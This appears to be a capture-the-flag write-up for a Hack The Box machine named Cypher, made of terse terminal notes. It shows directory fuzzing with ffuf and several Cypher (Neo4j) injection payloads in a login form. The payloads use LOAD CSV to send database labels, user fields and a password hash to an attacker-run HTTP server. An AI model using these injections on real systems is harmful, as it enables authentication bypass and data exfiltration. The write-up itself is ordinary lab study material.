80
adot@pwndot:~/htb/cypher$ echo 10.10.11.57 cypher.htb | sudo tee -a /etc/hosts
[sudo] password for adot:
10.10.11.57 cypher.htb
http://cypher.htb/

adot@pwndot:~/htb/cypher$ ffuf -w ~/opt/wordlists/directory-list-2.3-medium.txt -u http://cypher.htb/FUZZ -e html -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cypher.htb/FUZZ
:: Wordlist : FUZZ: /home/adot/opt/wordlists/directory-list-2.3-medium.txt
:: Extensions : html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
about [Status: 200, Size: 4986, Words: 1117, Lines: 179, Duration: 48ms]
login [Status: 200, Size: 3671, Words: 863, Lines: 127, Duration: 50ms]
index [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 51ms]
[Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 55ms]
demo [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
api [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 54ms]
testing [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 50ms]
[Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 46ms]
:: Progress: [441096/441096] :: Job [1/1] :: 4201 req/sec :: Duration: [0:01:44] :: Errors: 0 ::
http://cypher.htb/testing/

http://cypher.htb/login


Add a '


Was able to bypass the authentication query but not completely due to the app.py verifying the hash


adot@pwndot:~/htb/cypher/cyphermap$ echo Adot > test.txt
adot@pwndot:~/htb/cypher/cyphermap$ updog -p 80
' OR 1=1 LOAD CSV FROM 'http://10.10.14.18/test.txt' AS x LOAD CSV FROM 'http://10.10.14.18/'+x[0] AS y RETURN ''//

Tables
' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.18/'+d AS y RETURN y//

' OR 1=1 WITH 1 as a MATCH (u:USER) UNWIND keys(u) as p LOAD CSV FROM 'http://10.10.14.18:80/?' + p +'='+toString(u[p]) as l RETURN 0 as _0 //

graphasm
' OR 1=1 WITH 1 as a MATCH (f:SHA1) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.18:80/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

9f54ca4c130be6d529a56dee59dc2b2090e43acf
Can't crack the hash
Last updated
Was this helpful?